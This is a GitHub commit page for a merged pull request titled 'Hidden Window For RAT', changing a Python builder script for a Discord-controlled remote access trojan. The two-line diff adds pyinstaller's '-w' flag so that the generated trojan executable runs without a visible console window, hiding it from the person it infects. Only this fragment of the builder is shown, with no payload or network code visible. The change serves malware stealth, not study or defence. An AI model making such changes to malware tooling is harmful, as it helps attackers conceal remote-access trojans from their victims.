Skip to content

Commit

Permalink
Merge pull request #21 from nomrsavage/patch-1
Browse files Browse the repository at this point in the history
Hidden Window For RAT
  • Loading branch information
AstraaDev authored Jan 16, 2022
2 parents 63aa8ce + 14e660e commit 6fe223f
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions Additional_File/2_Rat/rat.py
Original file line number Diff line number Diff line change
Expand Up @@ -1226,7 +1226,7 @@ def shell():
os.system('cls' if os.name == 'nt' else 'clear')
print(f'{y}[{b}#{y}]{w} File creation...')
time.sleep(1)
os.system(f"pyinstaller -y -F temp/{fileName}.py")
os.system(f"pyinstaller -y -F -w temp/{fileName}.py")
os.system('cls' if os.name == 'nt' else 'clear')
print(f'{y}[{b}#{y}]{w} Cleaning up old files...')
time.sleep(1)
Expand All @@ -1247,4 +1247,4 @@ def shell():
input(f"{y}[{b}#{y}]{w} Press ENTER to exit")
main()

discordrat()
discordrat()

0 comments on commit 6fe223f

Please sign in to comment.